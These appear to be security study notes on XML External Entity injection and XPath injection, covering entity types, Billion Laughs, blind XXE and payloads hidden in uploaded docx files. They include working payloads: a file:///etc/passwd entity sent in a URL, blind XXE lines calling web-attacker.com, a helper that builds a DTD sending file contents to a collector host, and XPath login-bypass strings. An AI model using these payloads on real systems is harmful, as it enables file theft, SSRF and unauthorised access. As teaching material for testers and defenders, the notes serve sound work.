• XML stands for Extensible Markup Language.

  • It is a standardized way to store structured data which is both human & machine readable.

  • XML documents are composed of elements (tags). Elements can contain text or other elements, and can carry attributes, which hold values.

  • An optional component is the Document Type Definition [DTD].

    • It defines the structure of the document so that a validating parser can determine whether the document is valid, i.e. whether it conforms to the declared structure. Well-formedness is checked regardless of any DTD.

  • When an XML document is parsed by an XML parser, the parser generates a Document Object Model [DOM]. The DOM is queried programmatically later on to extract data from the document.

For example, once a document has been parsed into a DOM in Java, the application runs queries against the DOM to extract data from it.
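The parse-then-query flow can be sketched as follows. This uses Python's standard-library minidom rather than Java, and the sample document, element names and attribute names are all hypothetical, chosen only for illustration.

```python
from xml.dom import minidom

# Hypothetical sample document; the element and attribute names are illustrative.
XML_TEXT = """<?xml version="1.0"?>
<library>
  <book id="b1"><title>XML Basics</title></book>
  <book id="b2"><title>Parsing in Practice</title></book>
</library>"""

# Parsing produces a DOM tree held in memory.
dom = minidom.parseString(XML_TEXT)

# Query the DOM: collect (id attribute, title text) for every <book> element.
titles = []
for book in dom.getElementsByTagName("book"):
    book_id = book.getAttribute("id")
    title_node = book.getElementsByTagName("title")[0]
    titles.append((book_id, title_node.firstChild.data))

print(titles)
```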

XXE [XML External Entity Injection]

If a user wanted to create a <tag> with the content "I <3 XML", the XML parser would error out because it treats the < bracket as the beginning of a tag. This is where entities are helpful.


  • Entities are string representations of specific characters.

  • There are 5 predefined entities: &lt; (<), &gt; (>), &amp; (&), &apos; (') and &quot; (").
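A minimal sketch of the "I <3 XML" case, assuming Python's standard-library ElementTree as the parser. The helper name try_parse is made up for this example.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def try_parse(xml_text):
    """Return the root element's text, or None if the document is not well formed."""
    try:
        return ET.fromstring(xml_text).text
    except ET.ParseError:
        return None


# A raw '<' inside the content is read as the start of markup, so parsing fails.
raw = try_parse("<tag>I <3 XML</tag>")

# With the predefined entity &lt; the parser expands it back to '<'.
escaped = try_parse("<tag>I &lt;3 XML</tag>")

# escape() replaces &, < and > with their predefined entities before serialising.
safe_text = escape("I <3 XML & more")

print(raw, escaped, safe_text)
```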

Custom entities can be defined in the DTD.

  • Custom entities are only fully expanded when the parser needs them. For example, an external HTTP URI is not fetched when the entity is declared, but only when the entity is referenced in the XML document.

  • Internal Entities: Entities that represent some data within the document, defined as a string.

    • Useful when referencing the same long string multiple times in the document.

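  • Recursive Entities: An entity's value can reference another entity (nested references; an entity referencing itself is forbidden by XML). If bar2 is defined in terms of bar, then when bar2 is referenced the XML parser recursively expands the bar entity as well.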

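Denial of Service Attack: the Billion Laughs attack uses the above concept. A small document nests entities so that each level expands to ten copies of the level below, and the top-level entity expands to 1 billion "lol" strings, roughly 3 GB of text at 3 bytes each.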
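A small sketch of nested expansion and of the Billion Laughs arithmetic, assuming Python's standard-library ElementTree, which expands internal entities declared in the document's own DTD. The entity values and the helper expanded_size are illustrative assumptions. The sketch only computes the expanded size; it does not build the attack document.

```python
import xml.etree.ElementTree as ET

# bar2 is defined in terms of bar, so referencing bar2 expands both.
doc = """<!DOCTYPE foo [
  <!ENTITY bar "World">
  <!ENTITY bar2 "Hello &bar;">
]>
<foo>&bar2;</foo>"""

expanded = ET.fromstring(doc).text
print(expanded)


def expanded_size(base_len, fanout, levels):
    """Bytes produced when each level repeats the level below `fanout` times."""
    return base_len * fanout ** levels


# Classic layout: a 3-byte base entity "lol" and 9 nested levels of 10 references each.
size = expanded_size(len("lol"), 10, 9)
print(size)
```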

  • External Entities: Entities which represent data located outside of the document, defined as a URI. How the URI is processed to fetch the data is left up to the XML parser.

For example, an external entity bar declared with the SYSTEM keyword can point to a URI on a web server. When the XML parser encounters &bar;, it issues an HTTP request to the URI and stores the response in the DOM. URI processing is up to the parser, so depending on the parser and platform other schemes may also be supported:


  • file://

  • ftp://

  • php://filter/

  • expect:// [Useful for RCE]

XXE occurs when developers do not disable external entities. Many XML libraries do not disable them by default.

The following entity can be declared, for example:

<!DOCTYPE test [
    <!ENTITY foo SYSTEM "file:///etc/passwd">]>

http://URL/?param1=<!DOCTYPE test [<!ENTITY foo SYSTEM "file:///etc/passwd">]><test>%26foo;</test>

You can then simply reference foo as &foo; to have the corresponding content inserted into the XML document when it is parsed server side. When the payload is sent in a URL, remember to URL-encode & as %26.
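The encoding step can be sketched with Python's urllib. The base URL and the parameter name param1 are the placeholders already used above. Encoding every reserved character, not just &, is an assumption made here to keep the query string unambiguous.

```python
from urllib.parse import quote, unquote

payload = '<!DOCTYPE test [<!ENTITY foo SYSTEM "file:///etc/passwd">]><test>&foo;</test>'

# safe="" percent-encodes every reserved character, including & (%26) and ; (%3B).
encoded = quote(payload, safe="")
url = "http://URL/?param1=" + encoded

print(url)
```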

  • Parameter Entities

    • Can only be defined within a DTD.

    • Declared by adding a % before the entity name in the declaration, and referenced as %name; rather than &name;.

    • Useful when regular entities are disabled.

    • Useful for blind XXE.

They can be used to dynamically declare other parameter entities. Suppose the entity bar represents a string which contains the declaration of another entity, bar2. Inside that string, &#x25; is the hexadecimal character reference for %; a literal % there would make the parser think we are referencing another parameter entity. bar2 only exists once bar has been referenced, so bar2 can be referenced only after bar.

External DTDs

A DTD with entity definitions can be hosted externally and then referenced in the XML document.

Blind XXE

  • Occurs when parsed entities are not returned to the user. The URIs are still accessed, however, and a combination of internal DTDs, external DTDs and dynamically declared parameter entities can be used to exfiltrate data.
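How these pieces are commonly chained can be sketched as two small string builders, intended for an authorised test only. The function names, the entity names file, eval and exfil, the query parameter x and the example.com hosts are all assumptions for illustration. Whether a given parser actually follows the chain depends on its configuration.

```python
def build_exfil_dtd(file_uri, collector_url):
    """Return the text of an external DTD that chains parameter entities.

    %file;  reads the target resource.
    %eval;  dynamically declares %exfil; (note &#x25; standing in for %).
    %exfil; makes the parser request the collector URL with the data appended.
    """
    return (
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collector_url}?x=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def build_trigger_document(dtd_url):
    """Return the XML sent to the target: it only pulls in the external DTD."""
    return f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>\n<foo/>'


# Hypothetical hosts used purely as placeholders.
dtd_text = build_exfil_dtd("file:///etc/hostname", "http://collector.example.com/")
trigger = build_trigger_document("http://collector.example.com/evil.dtd")

print(dtd_text)
print(trigger)
```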

Error based

The vulnerability can lead to:

  • Local File Inclusion.

  • SSRF

  • Blind attacks (Data exfil)

  • Denial of service

  • RCE (sometimes)


XPath Injection

  • XPath is a query language that selects nodes from an XML document. It has no access-level permissions, so a query can refer to almost any part of an XML document, unlike SQL, which allows restrictions on databases, tables or columns.

  • Imagine the XML document as a database, and XPath as an SQL query.

  • If you can manipulate the query, you will be able to retrieve elements to which you normally should not have access.

#Identify by looking for 'xpath()' errors in the response.

Theory of Attack

#Sample XML Document
<?xml version="1.0" encoding="utf-8"?>
<Employees>
 <Employee ID="1">
  <Password>This is Secret</Password>
 </Employee>
 <Employee ID="2">
 </Employee>
</Employees>
  • XPath Query

"//Employee[UserName/text()='" & Request("UserName") & "' and Password/text()='" & Request("Password") & "']"

If we insert a malicious payload as the user name, the generated XPath query is as follows:

Username : test' or 1=1 or 'a'='a
Password : test

XPath Query:
//Employee[UserName/text()='test' or 1=1 or 'a'='a' and Password/text()='test']

This is equivalent to:
//Employee[(UserName/text()='test' or 1=1) or ('a'='a' and Password/text()='test')]

Thus, because 1=1 is always true, the first part of the predicate is true for every Employee node and the result of the second part no longer matters. The password becomes irrelevant and the attacker gets unauthorized access to the website.
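The string concatenation behind this can be reproduced in a few lines. The sketch below only builds the query string and does not evaluate it. XPath operators are lowercase, so it uses and. The function names build_query and is_safe_value are hypothetical, and the allowlist shown is just one possible mitigation.

```python
def build_query(username, password):
    # Vulnerable on purpose: user input is concatenated straight into the XPath.
    return (
        "//Employee[UserName/text()='" + username
        + "' and Password/text()='" + password + "']"
    )


def is_safe_value(value):
    """Hypothetical allowlist check: accept only letters and digits."""
    return value.isalnum()


normal = build_query("ABaker", "secret")
injected = build_query("test' or 1=1 or 'a'='a", "test")

print(normal)
print(injected)
print(is_safe_value("test' or 1=1 or 'a'='a"))
```

An allowlist like this rejects the quote characters the injection depends on. Parameterised XPath, where the library supports it, avoids the concatenation entirely.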


  • To cut off the rest of the XPath expression, you can append a null byte (URL-encoded as %00). XPath 1.0 has no comment syntax; the trick relies on the backend treating the null byte as a string terminator.

#If we want all results
hacker' or 1=1]%00 

#Accessing child nodes:
hacker' or 1=1]/child::node()%00&password=test

#Select parent of the current node, display all child nodes
hacker' or 1=1]/parent::*/child::node()%00

#Display specific child node. Here it is 'password'
hacker' or 1=1]/parent::*/password%00

Blind XXE

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]> 

#Using XML parameter entities as follows:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]> 

XXE in File Parsing

Office document formats such as Office Open XML (OOXML) and OpenDocument Format (ODF) are zip-compressed, XML-based file formats.

  • OOXML files: docx, pptx, xlsx. ODF files: odt, ods, odp and more.

  • Each file is a zip archive of multiple XML files, which are parsed when the document is processed.

  • A user can edit these XML files and inject an XXE payload. If the backend XML parser allows XML external entities, an attacker can abuse it to perform an XXE attack.


Methodology in Identifying Vulnerability

1. Observe the response after a successful file upload. If the XML parser is reading something from the docx file's XML contents and returning it to the user, that value marks a candidate injection point.

2. Open file.docx in Vi and identify the location where that value is present.

3. Insert the payload at the correct parsing location.

4. Upload the file. The payload is processed when the server parses the document.
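Steps 2 and 3 can also be scripted instead of done in an editor. The sketch below uses Python's zipfile on an in-memory archive. The helper names and the placeholder XML contents are assumptions. Only the member names [Content_Types].xml and word/document.xml follow the usual docx layout.

```python
import io
import zipfile


def make_sample_archive():
    """Build a tiny stand-in for a docx file (placeholder contents, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document>original</document>")
    return buf.getvalue()


def list_xml_parts(archive_bytes):
    """Return the names of the XML members inside the archive."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [name for name in zf.namelist() if name.endswith(".xml")]


def replace_part(archive_bytes, part_name, new_content):
    """Return a copy of the archive with one member's content replaced."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = new_content if item.filename == part_name else src.read(item.filename)
            dst.writestr(item, data)
    return out.getvalue()


original = make_sample_archive()
parts = list_xml_parts(original)
modified = replace_part(original, "word/document.xml", "<document>edited</document>")

with zipfile.ZipFile(io.BytesIO(modified)) as zf:
    edited_text = zf.read("word/document.xml").decode()

print(parts, edited_text)
```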
